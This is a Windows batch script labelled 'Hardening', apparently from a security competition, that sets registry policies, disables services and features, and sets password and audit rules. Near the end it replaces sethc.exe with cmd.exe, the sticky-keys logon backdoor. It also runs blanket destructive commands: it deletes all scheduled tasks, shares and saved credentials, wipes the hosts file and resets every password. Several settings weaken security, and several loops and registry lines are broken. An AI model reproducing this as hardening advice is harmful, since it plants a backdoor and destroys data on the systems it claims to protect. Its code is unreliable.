Hardening

  1. @echo off
  2. color 0f
  3. cls
  4. :admnchk
  5. echo Immediately checking for Administrative access
  6. net sessions
  7. if %errorlevel%==0 (
  8. echo Yay you have Admin u no how2windows GG
  9. goto :adminhop
  10. ) else (
  11. echo Lol u r bad
  12. echo N0 Adm1n n00b!
  13. pause
  14. exit
  15. )
  16. :adminhop
  17. REM Turns on UAC
  18. reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
  19. REM Turns off RDP
  20. reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
  21. reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
  22.  
  23. REM Failsafe
  24. if %errorlevel%==1 netsh advfirewall firewall set service type = remotedesktop mode = disable
  25. REM Windows auomatic updates
  26. reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v AUOptions /t REG_DWORD /d 3 /f
  27.  
  28.  
  29. echo Cleaning out the DNS cache...
  30. ipconfig /flushdns
  31. echo Writing over the hosts file...
  32. attrib -r -s C:\WINDOWS\system32\drivers\etc\hosts
  33. echo > C:\Windows\System32\drivers\etc\hosts
  34. if %errorlevel%==1 echo There was an error in writing to the hosts file (not running this as Admin probably)
  35. REM Services
  36. echo Showing you the services...
  37. net start
  38. echo Now writing services to a file and searching for vulnerable services...
  39. net start > servicesstarted.txt
  40. echo This is only common services, not nessecarily going to catch 100%
  41. REM looks to see if remote registry is on
  42. net start | findstr Remote Registry
  43. if %errorlevel%==0 (
  44. echo Remote Registry is running!
  45. echo Attempting to stop...
  46. net stop RemoteRegistry
  47. sc config RemoteRegistry start=disabled
  48. if %errorlevel%==1 echo Stop failed... sorry...
  49. ) else (
  50. echo Remote Registry is already indicating stopped.
  51. )
  52. REM Remove all saved credentials
  53. cmdkey.exe /list > "%TEMP%\List.txt"
  54. findstr.exe Target "%TEMP%\List.txt" > "%TEMP%\tokensonly.txt"
  55. FOR /F "tokens=1,2 delims= " %%G IN (%TEMP%\tokensonly.txt) DO cmdkey.exe /delete:%%H
  56. del "%TEMP%\*.*" /s /f /q
  57.  
  58.  
  59. REM looks to see if remote access is on
  60. set SRVC_LIST=(RemoteAccess Telephony tlntsvr p2pimsvc simptcp fax msftpsvc)
  61. for %%i in %HITHERE% do net stop %%i
  62. for %%i in %HITHERE% sc config %%i start= disabled
REM Rogue User Portion deleted.... disabling code because it's lame as hell....
REM Everything below is disabled (each line is REM) and kept only as a record of
REM the interactive account-deletion prompt that used to be here. Note that the
REM :deletion label it jumps to does not exist anywhere in this file.
REM net users
REM echo Would you like to delete a username?
REM set /p ynuser=Y or N?
REM if %ynuser%==Y (
REM set /p deluser=Enter a user to delete:
REM if %deluser%=="CYBERNEXS" echo DO NOT DELETE CYBERNEXS. IT WILL DISCONNECT TO SAIC.
REM if %deluser%=="CYBERNEXS" goto :deletion
REM net user %deluser% /delete
REM if %errorlevel%==0 echo Deletion successful.
REM goto :deletion
REM ) else (
REM echo K. Moving on.
REM )

  78. REM Guest Account is deactivating
  79. net user Guest | findstr Active | findstr Yes
  80. if %errorlevel%==0 echo Guest account is active, deactivating
  81. if %errorlevel%==1 echo Guest account is not active, checking default admin account
  82. net user Guest /active:NO
  83. REM Rename Guest Account
  84. wmic useraccount where name='Guest' rename baconsweggur
  85. REM Make sure you are not on the administrator account before you deactive administrator account
  86. echo Making sure you are not on the default admin account...
  87. net user | findstr Administrator
  88. if %errorlevel%==0 (
  89. echo "Administrator" account exists
  90. echo Looking to see if you are on it
  91. if "%username%"=="Administrator" (
  92. echo Awkward, you ARE the Administrator account
  93. goto :skipcode
  94. )
  95. net user Administrator /active:NO
  96. )
  97. :skipcode
  98. set /p newpwd=Enter a new password for your accounts:
  99. net users > userlist.txt
  100. (
  101. for /F %%h in (userlist.txt) do (
  102. echo %%h | findstr NEXS
  103. if %errorlevel%==1 net user %%h %newpwd% >> userlist.txt
  104. )
  105. )
  106.  
  107. REM Now on to the firewall. Disables common rules.
  108. netsh advfirewall firewall set rule name="Remote Assistance (DCOM-In)" new enable=no >NUL
  109. netsh advfirewall firewall set rule name="Remote Assistance (PNRP-In)" new enable=no >NUL
  110. netsh advfirewall firewall set rule name="Remote Assistance (RA Server TCP-In)" new enable=no >NUL
  111. netsh advfirewall firewall set rule name="Remote Assistance (SSDP TCP-In)" new enable=no >NUL
  112. netsh advfirewall firewall set rule name="Remote Assistance (SSDP UDP-In)" new enable=no >NUL
  113. netsh advfirewall firewall set rule name="Remote Assistance (TCP-In)" new enable=no >NUL
  114. netsh advfirewall firewall set rule name="Telnet Server" new enable=no >NUL
  115. netsh advfirewall firewall set rule name="netcat" new enable=no >NUL
  116.  
  117. REM Disabling Windows Features
  118. REM Assuming they are on, if they aren't then boo-who
  119. dism /online /disable-feature /featurename:IIS-WebServerRole >NUL
  120. dism /online /disable-feature /featurename:IIS-WebServer >NUL
  121. dism /online /disable-feature /featurename:IIS-CommonHttpFeatures >NUL
  122. dism /online /disable-feature /featurename:IIS-HttpErrors >NUL
  123. dism /online /disable-feature /featurename:IIS-HttpRedirect >NUL
  124. dism /online /disable-feature /featurename:IIS-ApplicationDevelopment >NUL
  125. dism /online /disable-feature /featurename:IIS-NetFxExtensibility >NUL
  126. dism /online /disable-feature /featurename:IIS-NetFxExtensibility45 >NUL
  127. dism /online /disable-feature /featurename:IIS-HealthAndDiagnostics >NUL
  128. dism /online /disable-feature /featurename:IIS-HttpLogging >NUL
  129. dism /online /disable-feature /featurename:IIS-LoggingLibraries >NUL
  130. dism /online /disable-feature /featurename:IIS-RequestMonitor >NUL
  131. dism /online /disable-feature /featurename:IIS-HttpTracing >NUL
  132. dism /online /disable-feature /featurename:IIS-Security >NUL
  133. dism /online /disable-feature /featurename:IIS-URLAuthorization >NUL
  134. dism /online /disable-feature /featurename:IIS-RequestFiltering >NUL
  135. dism /online /disable-feature /featurename:IIS-IPSecurity >NUL
  136. dism /online /disable-feature /featurename:IIS-Performance >NUL
  137. dism /online /disable-feature /featurename:IIS-HttpCompressionDynamic >NUL
  138. dism /online /disable-feature /featurename:IIS-WebServerManagementTools >NUL
  139. dism /online /disable-feature /featurename:IIS-ManagementScriptingTools >NUL
  140. dism /online /disable-feature /featurename:IIS-IIS6ManagementCompatibility >NUL
  141. dism /online /disable-feature /featurename:IIS-Metabase >NUL
  142. dism /online /disable-feature /featurename:IIS-HostableWebCore >NUL
  143. dism /online /disable-feature /featurename:IIS-StaticContent >NUL
  144. dism /online /disable-feature /featurename:IIS-DefaultDocument >NUL
  145. dism /online /disable-feature /featurename:IIS-DirectoryBrowsing >NUL
  146. dism /online /disable-feature /featurename:IIS-WebDAV >NUL
  147. dism /online /disable-feature /featurename:IIS-WebSockets >NUL
  148. dism /online /disable-feature /featurename:IIS-ApplicationInit >NUL
  149. dism /online /disable-feature /featurename:IIS-ASPNET >NUL
  150. dism /online /disable-feature /featurename:IIS-ASPNET45 >NUL
  151. dism /online /disable-feature /featurename:IIS-ASP >NUL
  152. dism /online /disable-feature /featurename:IIS-CGI >NUL
  153. dism /online /disable-feature /featurename:IIS-ISAPIExtensions >NUL
  154. dism /online /disable-feature /featurename:IIS-ISAPIFilter >NUL
  155. dism /online /disable-feature /featurename:IIS-ServerSideIncludes >NUL
  156. dism /online /disable-feature /featurename:IIS-CustomLogging >NUL
  157. dism /online /disable-feature /featurename:IIS-BasicAuthentication >NUL
  158. dism /online /disable-feature /featurename:IIS-HttpCompressionStatic >NUL
  159. dism /online /disable-feature /featurename:IIS-ManagementConsole >NUL
  160. dism /online /disable-feature /featurename:IIS-ManagementService >NUL
  161. dism /online /disable-feature /featurename:IIS-WMICompatibility >NUL
  162. dism /online /disable-feature /featurename:IIS-LegacyScripts >NUL
  163. dism /online /disable-feature /featurename:IIS-LegacySnapIn >NUL
  164. dism /online /disable-feature /featurename:IIS-FTPServer >NUL
  165. dism /online /disable-feature /featurename:IIS-FTPSvc >NUL
  166. dism /online /disable-feature /featurename:IIS-FTPExtensibility >NUL
  167. dism /online /disable-feature /featurename:TFTP >NUL
  168. dism /online /disable-feature /featurename:TelnetClient >NUL
  169. dism /online /disable-feature /featurename:TelnetServer >NUL
  170.  
  171. REM now on to the power settings
  172. REM use commands as vague as possible to set a require password on wakeup
  173. REM assumes its a laptop, which is silly
  174. powercfg -SETDCVALUEINDEX SCHEME_BALANCED SUB_NONE CONSOLELOCK 1
  175. powercfg -SETACVALUEINDEX SCHEME_BALANCED SUB_NONE CONSOLELOCK 1
  176. powercfg -SETDCVALUEINDEX SCHEME_MIN SUB_NONE CONSOLELOCK 1
  177. powercfg -SETDCVALUEINDEX SCHEME_MIN SUB_NONE CONSOLELOCK 1
  178. powercfg -SETDCVALUEINDEX SCHEME_MAX SUB_NONE CONSOLELOCK 1
  179. powercfg -SETDCVALUEINDEX SCHEME_MAX SUB_NONE CONSOLELOCK 1
  180.  
  181. REM Automatically delete all network shares that are 1 word or less cause I have no system for
  182. net share > sharelist.txt
  183. (
  184. for /F %%h in (sharelist.txt) do (
  185. net share /delete %%h >> deletedsharelist.txt
  186. )
  187. )
  188. pause
  189. REM Common Policies
  190. REM Restrict CD ROM drive
  191. reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllocateCDRoms /t REG_DWORD /d 1 /f
  192. REM Automatic Admin logon
  193. reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_DWORD /d 0 /f
  194. REM Logo message text
  195. reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /t REG_SZ /d "Lol noobz pl0x don't hax, thx bae"
  196. REM Logon message title bar
  197. reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /t REG_SZ /d "Dnt hax me"
  198. REM Wipe page file from shutdown
  199. reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v ClearPageFileAtShutdown /t REG_DWORD /d 1 /f
  200. REM LOL this is a key? Disallow remote access to floppie disks
  201. reg ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllocateFloppies /t REG_DWORD /d 1 /f
  202. REM Prevent print driver installs
  203. reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\LanMan Print Services\Servers" /v AddPrinterDrivers /t REG_DWORD /d 1 /f
  204. REM Limit local account use of blank passwords to console
  205. reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 1 /f
  206. REM Auditing access of Global System Objects
  207. reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v auditbaseobjects /t REG_DWORD /d 1 /f
  208. REM Auditing Backup and Restore
  209. reg ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v fullprivilegeauditing /t REG_DWORD /d 1 /f
  210. REM Do not display last user on logon
  211. reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 1 /f
  212. REM UAC setting (Prompt on Secure Desktop)
  213. reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t REG_DWORD /d 1 /f
  214. REM Enable Installer Detection
  215. reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 1 /f
  216. REM Undock without logon
  217. reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v undockwithoutlogon /t REG_DWORD /d 0 /f
  218. REM Maximum Machine Password Age
  219. reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v MaximumPasswordAge /t REG_DWORD /d 15 /f
  220. REM Disable machine account password changes
  221. reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v DisablePasswordChange /t REG_DWORD /d 1 /f
  222. REM Require Strong Session Key
  223. reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v RequireStrongKey /t REG_DWORD /d 1 /f
  224. REM Require Sign/Seal
  225. reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v RequireSignOrSeal /t REG_DWORD /d 1 /f
  226. REM Sign Channel
  227. reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v SignSecureChannel /t REG_DWORD /d 1 /f
  228. REM Seal Channel
  229. reg ADD HKLM\SYSTEM\CurrentControlSet\services\Netlogon\Parameters /v SealSecureChannel /t REG_DWORD /d 1 /f
  230. REM Don't disable CTRL+ALT+DEL even though it serves no purpose
  231. reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCAD /t REG_DWORD /d 0 /f
  232. REM Restrict Anonymous Enumeration #1
  233. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_DWORD /d 1 /f
  234. REM Restrict Anonymous Enumeration #2
  235. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymoussam /t REG_DWORD /d 1 /f
  236. REM Idle Time Limit - 45 mins
  237. reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v autodisconnect /t REG_DWORD /d 45 /f
  238. REM Require Security Signature - Disabled pursuant to checklist
  239. reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v enablesecuritysignature /t REG_DWORD /d 0 /f
  240. REM Enable Security Signature - Disabled pursuant to checklist
  241. reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v requiresecuritysignature /t REG_DWORD /d 0 /f
  242. REM Disable Domain Credential Storage
  243. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v disabledomaincreds /t REG_DWORD /d 1 /f
  244. REM Don't Give Anons Everyone Permissions
  245. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v everyoneincludesanonymous /t REG_DWORD /d 0 /f
  246. REM SMB Passwords unencrypted to third party? How bout nah
  247. reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanWorkstation\Parameters /v EnablePlainTextPassword /t REG_DWORD /d 0 /f
  248. REM Null Session Pipes Cleared
  249. reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v NullSessionPipes /t REG_MULTI_SZ /d "" /f
  250. REM Remotely accessible registry paths cleared
  251. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedExactPaths /v Machine /t REG_MULTI_SZ /d "" /f
  252. REM Remotely accessible registry paths and sub-paths cleared
  253. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedPaths /v Machine /t REG_MULTI_SZ /d "" /f
  254. REM Restict anonymous access to named pipes and shares
  255. reg ADD HKLM\SYSTEM\CurrentControlSet\services\LanmanServer\Parameters /v NullSessionShares /t REG_MULTI_SZ /d "" /f
  256. REM Allow to use Machine ID for NTLM
  257. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v UseMachineId /t REG_DWORD /d 0 /f
  258.  
  259. REM Internet Explorer
  260. REM Smart Screen for IE8
  261. reg ADD "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter" /v EnabledV8 /t REG_DWORD /d 1 /f
  262. REM Smart Screen for IE9+
  263. reg ADD "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 1 /f
  264.  
  265. REM Windows Explorer Settings
  266. reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 1 /f
  267. reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 1 /f
  268. REM Disable Dump file creation
  269. reg ADD HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /v CrashDumpEnabled /t REG_DWORD /d 0 /f
  270. REM Disable Autorun
  271. reg ADD HKCU\SYSTEM\CurrentControlSet\Services\CDROM /v AutoRun /t REG_DWORD /d 1 /f
  272.  
  273. REM Disabled Internet Explorer Password Caching
  274. reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v DisablePasswordCaching /t REG_DWORD /d 1 /f
  275.  
  276. REM Internet Explorer Settings
  277.  
  278. REM Enable Do Not Track
  279. reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v DoNotTrack /t REG_DWORD /d 1 /f
  280. reg ADD "HKCU\Software\Microsoft\Internet Explorer\Download" /v RunInvalidSignatures /t REG_DWORD /d 1 /f
  281. reg ADD "HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\Settings" /v LOCALMACHINE_CD_UNLOCK /t REG_DWORD /d 1 /t
  282. reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v WarnonBadCertRecving /t REG_DWORD /d /1 /f
  283. reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v WarnOnPostRedirect /t REG_DWORD /d 1 /f
  284. reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v WarnonZoneCrossing /t REG_DWORD /d 1 /f
  285.  
  286. REM account password policy set
  287. echo New requirements are being set for your passwords
  288. net accounts /FORCELOGOFF:30 /MINPWLEN:8 /MAXPWAGE:30 /MINPWAGE:10 /UNIQUEPW:3
  289. echo New password policy:
  290. echo Force log off after 30 minutes
  291. echo Minimum password length of 8 characters
  292. echo Maximum password age of 30
  293. echo Minimum password age of 10
  294. echo Unique password threshold set to 3 (default is 5)
  295. pause
  296. REM Delete system tasks
  297. schtasks /Delete /TN *
  298.  
  299. REM Integrated Stick Keys
  300. REM Give permissions needed
  301. takeown /f cmd.exe >NUL
  302. takeown /f sethc.exe >NUL
  303. icacls cmd.exe /grant %username%:F >NUL
  304. icacls sethc.exe /grant %username%:F >NUL
  305. REM Renaming and stuff
  306. move sethc.exe sethc.old.exe
  307. copy cmd.exe sethc.exe
  308. echo Stick Keys exploit triggered
  309.  
  310. REM Saved Credentials
  311.  
  312.  
  313. REM Auditing Policy
  314. auditpol /set /category:* /success:enable
  315. auditpol /set /category:* /failure:enable
  316. REM system verification
  317. sfc /verifyonly
  318. pause